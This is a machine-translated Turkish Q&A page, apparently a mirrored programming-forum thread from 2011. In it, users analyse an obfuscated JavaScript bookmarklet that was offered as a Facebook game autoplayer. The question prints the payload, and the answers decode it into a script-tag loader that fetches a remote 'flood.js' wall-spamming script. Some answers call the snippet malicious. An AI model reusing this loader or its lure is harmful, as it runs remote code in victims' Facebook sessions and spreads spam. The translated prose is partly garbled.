1. ev
  2. Soru-cevap
  3. birisi ben bu kod ama facebook oyunları için bana otomatik oyna vereceğini söyle bir forumda buldum bu javascript

birisi ben bu kod ama facebook oyunları için bana otomatik oyna vereceğini söyle bir forumda buldum bu javascript

2011-07-02 13 views
8

şifresini Can ben bu onlar bu zararlı script korkuyor im, söylediklerine olmadığını korkuyorbirisi ben bu kod ama facebook oyunları için bana otomatik oyna vereceğini söyle bir forumda buldum bu javascript

yardım lütfen :)

javascript:var _0x8dd5=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x7 2\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x 68\x74\x74\x70\x3A\x2F\x2F\x75\x67\x2D\x72\x61\x64 \x69\x6F\x2E\x63\x6F\x2E\x63\x63\x2F\x66\x6C\x6F\x 6F\x64\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\ x68\x69\x6C\x64","\x62\x6F\x64\x79"];(a=(b=document)[_0x8dd5[2]](_0x8dd5[1]))[_0x8dd5[0]]=_0x8dd5[3];b[_0x8dd5[5]][_0x8dd5[4]](a); void (0);

kaynak

2011-07-02 xzanrzk

+1

Kesinlikle * * görünüyor. – Piskvor

cevap

11

kaçış dizileri deşifre etmek suretiyle başlatmak ve bu _0x8dd5 değişken adı kurtulmak edelim:

(a=(b=document)["createElement"]("script"))["src"]="http://ug-radio.co.cc/flood.js"; 
b["body"]["appendChild"](a); 
void (0);
: 

var x=[ 
    "src","script","createElement","http://ug-radio.co.cc/flood.js", 
    "appendChild","body" 
]; 
(a=(b=document)[x[2]](x[1]))[x[0]]=x[3]; 
b[x[5]][x[4]](a); 
void (0);

diziden dize ikame edilerek ile bırakılan

Peki, komut yapar basitçe:

e

I.e. Bu sayfadaki Javascript http://ug-radio.co.cc/flood.js yükler.

yüklenen dosyada komut baktığımızda, "Wallflood By X-Cisadane" kendisini çağırır. Arkadaşlarınızın bir listesini almak ve onlara (veya belki de) bir mesaj göndermek gibi görünüyor.

Kesinlikle

hiçbir şey oyunlar için otomatik çalma ile ilgisi yok. kötü amaçlı komut benzer kandırma kullanır gibi

kaynak

2011-07-02 12:23:57 Guffa

+0

teşekkürler, JS ile çok tanıdık değilim ama açıklamanız benim gibi insanlar için çok açık, efendim, çok teşekkürler :) – xzanrzk

4

Eh, ilan var aslında şudur:

var _0x8dd5= [ 
    'src', 'script', 'cx7 2eateElement', 
    'x 68ttp://ug-rad io.co.cc/flox 6Fd.js', 'appendC x68ild', 'body' 
];

dinlenme anlamaya basittir.

kaynak

2011-07-02 12:04:24

+0

Peki, benden önce bunu anlamanız için size milyonlarca dolar vermek istiyorum. Ama verebileceğim tek şey bir :) – mihsathe

+0

Neden \ x72 bir r'ye dönüşmüyor? H için \ x68 için de aynı? (Ben aynı şeyi jsfiddle'ta yaptığını fark ettim) – jglouie

+0

Bu efendim nasıl yapabilirsin? Btw çok teşekkürler :) – xzanrzk

6

Firebug'u açtım ve komut dosyasının bir kısmını konsola yapıştırdım (yalnızca kod çalıştırmak yerine bir değişken oluşturan parçayı yapıştırmaya dikkat edin). Bu bende ne olduğunu:

Ben yapıştırılan Ne:

console.log(["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x7 2\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x 68\x74\x74\x70\x3A\x2F\x2F\x75\x67\x2D\x72\x61\x64 \x69\x6F\x2E\x63\x6F\x2E\x63\x63\x2F\x66\x6C\x6F\x 6F\x64\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\ x68\x69\x6C\x64","\x62\x6F\x64\x79"]);

sonucu: Kısacası

["src", "script", "cx7 2eateElement", "x 68ttp://ug-rad io.co.cc/flox 6Fd.js", "appendC x68ild", "body"]

, uzak bir sunucudan harici JavaScript dosyası yüklemek için script gibi bu benzediğini çok tehlikeli görünümlü alan adı ile.

Ne beklediğinize dönüştürülmeyen birkaç karakter var. Bu, URL'ler veya createElement vb. Için referanslar içeren komut dosyaları arayan herhangi bir otomatik kötü amaçlı yazılım denetleyicisini kandırmak için yazım hataları (olası değil) veya daha fazla gizleme olabilir. Geriye kalan yazı, bu karakterleri çalıştırmadan önce teker teker geri yerleştirir.

_0x8dd5için seçilir değişken adı altıgen kodu gibi bakmak ve okumak için her şey daha zor hale, ama aslında o sadece normal bir JavaScript değişken bir isim. Kasten boşlukları düzeltmek için karakterleri dizenin bir bölümünden diğerine kopyalarken, komut dosyasının geri kalanında tekrar tekrar başvurulur.

Kesinlikle kötü amaçlı bir komut dosyası.

Hemen yanmasını öneriyorum! 

var _0x8dd5 = ["src", "script", "createElement", "http://ug-radio.co.cc/flood.js", "appendChild", "body"];

Ben "kabaca" Ben verilerini ayrıştırmak için Chrome'un JavaScript konsolunu kullandığım için söylemek ve bazı şeyler: ;-)

kaynak

2011-07-02 12:07:47 Spudley

1

Eh ilk deyimi kabaca aşağıdaki içeriği ile bir dizi kuruyor biraz bozuk görünüyor. Bozuk bölümleri elimden geldiğince temizledim.

var b = document; 
var a = b.createElement("script"); 
a.src = "http://ug-radio.co.cc/flood.js"; 
b.body.appendChild(a);

Yani temelde, bu belgeye (muhtemelen zararlı) komut dosyası ekliyor:

dinlenme çizgisinde bir şey çağırarak gibi görünüyor.

kaynak

2011-07-02 12:13:19 aroth

+0

yardım için çok teşekkürler üzgünüm js hakkında çok fazla bilmiyorum :) – xzanrzk

1

Muhtemelen bunu nasıl çözeceğinizi veya nasıl kodlandığını biliyorsunuzdur, ancak emin olmayanlar için, 2 basamaklı onaltılı kaçış dizisinden başka bir şey değildir. Ayrıca, \ udddd (örn. "\ U0032", "2") veya sekizli için \ ddd kullanılarak 4 haneli olabilir.

Decoding hex string in javascript

kaynak

2011-07-02 12:19:52

İlgili konular

 İlgili konular